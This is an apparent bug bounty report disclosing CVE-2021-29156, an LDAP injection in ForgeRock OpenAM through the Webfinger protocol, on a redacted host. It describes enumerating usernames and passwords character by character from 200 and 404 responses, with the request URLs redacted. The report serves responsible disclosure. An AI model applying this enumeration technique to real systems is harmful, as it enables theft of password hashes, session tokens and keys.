[CVE-2021-29156] LDAP Injection at https://██████

**Description:** https://█████ is vulnerable to CVE-2021-29156 ## References * https://hackerone.com/reports/1278050 * https://nvd.nist.gov/vuln/detail/CVE-2021-29156 * https://portswigger.net/research/hidden-oauth-attack-vectors * https://github.com/projectdiscovery/nuclei-templates/blob/74db4223c11d27a934ca1c417aa4abca9e70ad35/cves/2021/CVE-2021-29156.yaml ## Impact ForgeRock OpenAM before 13.5.1 allows LDAP injection via the Webfinger protocol. For example, an unauthenticated attacker can perform character-by-character retrieval of password hashes, or retrieve a session token or a private key. ## System Host(s) ███████ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2021-29156 ## Steps to Reproduce The references mentioned shall be helpful for successful reproduction, especially the one I reported the earlier day (#1278050) and the PortSwigger one. * Username starting with ██████████ exists: https://█████████/███/███████[200 OK] * Username starting with ███████ doesn't exist: https://██████████/██████████/█████████████[404 Not Found] For 200 OK response, it also throws out OpenAM instance address: **`███`** Similar thing can be done for password enumeration as well. You can find the scripts I wrote for username and password enumeration in my earlier report at a different host. ## Suggested Mitigation/Remediation Actions